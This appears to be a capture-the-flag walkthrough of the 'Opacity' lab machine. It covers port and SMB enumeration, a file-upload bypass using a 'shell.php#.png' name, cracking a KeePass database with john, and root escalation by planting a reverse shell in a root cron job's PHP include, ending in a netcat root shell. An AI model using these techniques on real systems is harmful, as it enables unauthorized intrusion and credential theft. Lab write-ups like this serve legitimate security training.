Opacity
File upload Bypass - KeePass Cracking - CronJob PrivEsc
Port Scanning
Starting off with the nmap scan
22/tcp open ssh syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 0fee2910d98e8c53e64de3670c6ebee3 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCa4rFv9bD2hlJ8EgxU6clOj6v7GMUIjfAr7fzckrKGPnvxQA3ikvRKouMMUiYThvvfM7gOORL5sicN3qHS8cmRsLFjQVGyNL6/nb+MyfUJlUYk4WGJYXekoP5CLhwGqH/yKDXzdm1g8LR6afYw8fSehE7FM9AvXMXqvj+/WoC209pWu/s5uy31nBDYYfRP8VG3YEJqMTBgYQIk1RD+Q6qZya1RQDnQx6qLy1jkbrgRU9mnfhizLVsqZyXuoEYdnpGn9ogXi5A0McDmJF3hh0p01+KF2/+GbKjJrGNylgYtU1/W+WAoFSPE41VF7NSXbDRba0WIH5RmS0MDDFTy9tbKB33sG9Ct6bHbpZCFnxBi3toM3oBKYVDfbpbDJr9/zEI1R9ToU7t+RH6V0zrljb/cONTQCANYxESHWVD+zH/yZGO4RwDCou/ytSYCrnjZ6jHjJ9TWVkRpVjR7VAV8BnsS6egCYBOJqybxW2moY86PJLBVkd6r7x4nm19yX4AQPm8=
| 256 9542cdfc712799392d0049ad1be4cf0e (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAqe7rEbmvlsedJwYaZCIdligUJewXWs8mOjEKjVrrY/28XqW/RMZ12+4wJRL3mTaVJ/ftI6Tu9uMbgHs21itQQ=
| 256 edfe9c94ca9c086ff25ca6cf4d3c8e5b (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINQSFcnxA8EchrkX6O0RPMOjIUZyyyQT9fM4z4DdCZyA
80/tcp open http syn-ack Apache httpd 2.4.41 ((Ubuntu))
| http-title: Login
|_Requested resource was login.php
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.41 (Ubuntu)
139/tcp open netbios-ssn syn-ack Samba smbd 4.6.2
445/tcp open netbios-ssn syn-ack Samba smbd 4.6.2
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: -1s
| nbstat: NetBIOS name: OPACITY, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| Names:
| OPACITY<00> Flags: <unique><active>
| OPACITY<03> Flags: <unique><active>
| OPACITY<20> Flags: <unique><active>
| \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| WORKGROUP<00> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
| WORKGROUP<1e> Flags: <group><active>
| Statistics:
| 0000000000000000000000000000000000
| 0000000000000000000000000000000000
|_ 0000000000000000000000000000
| smb2-time:
| date: 2023-06-06T07:00:33
|_ start_date: N/A
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 29246/tcp): CLEAN (Couldn't connect)
| Check 2 (port 6171/tcp): CLEAN (Couldn't connect)
| Check 3 (port 20231/udp): CLEAN (Failed to receive data)
| Check 4 (port 32869/udp): CLEAN (Failed to receive data)
|_ 0/4 checks are positive: Host is CLEAN or ports are blockedLet's make some mental notes :)
SSH isn't vulnerable
SMB ports are intersting
HTTP enumeration is required, most-likey to get the initial foothold
SMB Enumeration
$ smbclient -L \\\\10.10.157.10\\ 20.2s _ Tuesday 06 June 2023 12:33:16 PM
Password for [WORKGROUP\cash]:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
IPC$ IPC IPC Service (opacity server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
smbXcli_negprot_smb1_done: No compatible protocol selected by server.
protocol negotiation failed: NT_STATUS_INVALID_NETWORK_RESPONSE
Unable to connect with SMB1 -- no workgroup available$ crackmapexec smb 10.10.157.10 -u 'anonymous' -p 'anonymous' --shares 4160ms _ Tuesday 06 June 2023 12:33:36 PM
SMB 10.10.157.10 445 OPACITY [*] Windows 6.1 Build 0 (name:OPACITY) (domain:) (signing:False) (SMBv1:False)
SMB 10.10.157.10 445 OPACITY [+] \anonymous:anonymous
SMB 10.10.157.10 445 OPACITY [+] Enumerated shares
SMB 10.10.157.10 445 OPACITY Share Permissions Remark
SMB 10.10.157.10 445 OPACITY ----- ----------- ------
SMB 10.10.157.10 445 OPACITY print$ Printer Drivers
SMB 10.10.157.10 445 OPACITY IPC$ IPC Service (opacity server (Samba, Ubuntu))$ impacket-lookupsid 'opacity.thm/anonymous@10.10.157.10' -no-pass | tee users.txt 9.8s _ Tuesday 06 June 2023 12:36:31 PM
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[*] Brute forcing SIDs at 10.10.157.10
[*] StringBinding ncacn_np:10.10.157.10[\pipe\lsarpc]
[-] nca_s_op_rng_error$ smbmap -H 10.10.157.10 4032ms _ Tuesday 06 June 2023 12:37:38 PM
[+] IP: 10.10.157.10:445 Name: opacity.thm
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
IPC$ NO ACCESS IPC Service (opacity server (Samba, Ubuntu))Therefore, SMB is of no use to us !
HTTP Enumeration
On visiting the webpage, it redirects us to the login page - login.php
Let's look for some hidden directories
[12:39:41] 403 - 276B - /.ht_wsr.txt
[12:39:41] 403 - 276B - /.htaccess.bak1
[12:39:41] 403 - 276B - /.htaccess.orig
[12:39:41] 403 - 276B - /.htaccess.sample
[12:39:41] 403 - 276B - /.htaccess.save
[12:41:04] 301 - 310B - /cloud -> http://opacity.thm/cloud/
[12:41:04] 200 - 639B - /cloud/
[12:41:13] 301 - 308B - /css -> http://opacity.thm/css/
[12:41:54] 200 - 848B - /login.php
[12:42:38] 403 - 276B - /server-status
[12:42:38] 403 - 276B - /server-status/The /cloud directory looks interesting, on visiting that endpoint
We can get to know that its a file-upload functionality page........which takes a URL as an input and fetches image
We can quickly set a python http server and host a jpeg file to know that applications functionality - Returns 200 OK
If we try to upload a .php file, it denies :(
So the backend is validating on extensions, inorder to bypass this we can rename shell.php to shell.php#.png
Looking at the www-data's home directory, we can find some creds from the login.php source code
Let’s log in to the website via the credential we got, we can even try password spraying on the users - sysadmin and root, but nothing worked ;(
Lateral Move => Sysadmin
Since we got to a dead end I started looking around, and I found the dataset.kdbx in the /opt folder - Transferred it to our machine and analyzed it using the file command
It seems to be a KeePass database file, we can easily crack it via john
$ keepass2john dataset.kdbx > keepasshash.txt
$ john keepasshash.txt --wordlist=/opt/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (KeePass [SHA256 AES 32/64])
Cost 1 (iteration count) is 100000 for all loaded hashes
Cost 2 (version) is 2 for all loaded hashes
Cost 3 (algorithm [0=AES 1=TwoFish 2=ChaCha]) is 0 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
741852963 (dataset)
1g 0:00:00:09 DONE (2023-06-06 13:26) 0.1015g/s 89.34p/s 89.34c/s 89.34C/s chichi..david1
Use the "--show" option to display all of the cracked passwords reliably
Session completed.We can use the KeePass2 GUI functionality to open the database file
We can now SSH into the box as sysadmin :)
Privilege Escalation => Root
Since we are a stable user now we can cat the local.txt
Let's start enumerating from here, the scripts directory looks interesting !
sysadmin@opacity:~$ cd scripts/
sysadmin@opacity:~/scripts$ ls
lib script.php
sysadmin@opacity:~/scripts$
sysadmin@opacity:~/scripts$ cat script.php
<?php
//Backup of scripts sysadmin folder
require_once('lib/backup.inc.php');
zipData('/home/sysadmin/scripts', '/var/backups/backup.zip');
echo 'Successful', PHP_EOL;
//Files scheduled removal
$dir = "/var/www/html/cloud/images";
if(file_exists($dir)){
$di = new RecursiveDirectoryIterator($dir, FilesystemIterator::SKIP_DOTS);
$ri = new RecursiveIteratorIterator($di, RecursiveIteratorIterator::CHILD_FIRST);
foreach ( $ri as $file ) {
$file->isDir() ? rmdir($file) : unlink($file);
}
}
?>So the script.php requires another file called backup.inc.php which is in the /lib
sysadmin@opacity:~/scripts/lib$ ls -lahs
total 132K
4.0K drwxr-xr-x 2 sysadmin root 4.0K Jul 26 2022 .
4.0K drwxr-xr-x 3 root root 4.0K Jul 8 2022 ..
12K -rw-r--r-- 1 root root 9.3K Jul 26 2022 application.php
4.0K -rw-r--r-- 1 root root 967 Jul 6 2022 backup.inc.php
24K -rw-r--r-- 1 root root 24K Jul 26 2022 bio2rdfapi.php
12K -rw-r--r-- 1 root root 11K Jul 26 2022 biopax2bio2rdf.php
8.0K -rw-r--r-- 1 root root 7.5K Jul 26 2022 dataresource.php
8.0K -rw-r--r-- 1 root root 4.8K Jul 26 2022 dataset.php
4.0K -rw-r--r-- 1 root root 3.2K Jul 26 2022 fileapi.php
4.0K -rw-r--r-- 1 root root 1.3K Jul 26 2022 owlapi.php
4.0K -rw-r--r-- 1 root root 1.5K Jul 26 2022 phplib.php
12K -rw-r--r-- 1 root root 11K Jul 26 2022 rdfapi.php
20K -rw-r--r-- 1 root root 17K Jul 26 2022 registry.php
8.0K -rw-r--r-- 1 root root 6.8K Jul 26 2022 utils.php
4.0K -rwxr-xr-x 1 root root 3.9K Jul 26 2022 xmlapi.phpAll the files are owned by root here, let's try copying the backup file from lib directory to our home directory so that we can edit it
sysadmin@opacity:~/scripts/lib$ cp backup.inc.php ../
cp: cannot create regular file '../backup.inc.php': Permission denied
sysadmin@opacity:~/scripts/lib$ cp backup.inc.php ../../
sysadmin@opacity:~/scripts/lib$ cd ..
sysadmin@opacity:~/scripts$ ls
lib script.php
sysadmin@opacity:~/scripts$ cd ..
sysadmin@opacity:~$ ls
backup.inc.php local.txt scriptsWe'll now remove the duplicate file which is in the /lib directory - now we'll have to insert our php reverse payload and put it back where it was and wait till the cron executes it
$ rlwrap nc -nlvp 9999 Tuesday 06 June 2023 01:39:37 PM
listening on [any] 9999 ...
connect to [10.8.74.51] from (UNKNOWN) [10.10.157.10] 43978
Linux opacity 5.4.0-139-generic #156-Ubuntu SMP Fri Jan 20 17:27:18 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux
08:10:02 up 1:12, 1 user, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
sysadmin pts/1 10.8.74.51 08:00 10.00s 0.12s 0.12s -bash
uid=0(root) gid=0(root) groups=0(root)
sh: 0: can't access tty; job control turned off
# whoami
rootLast updated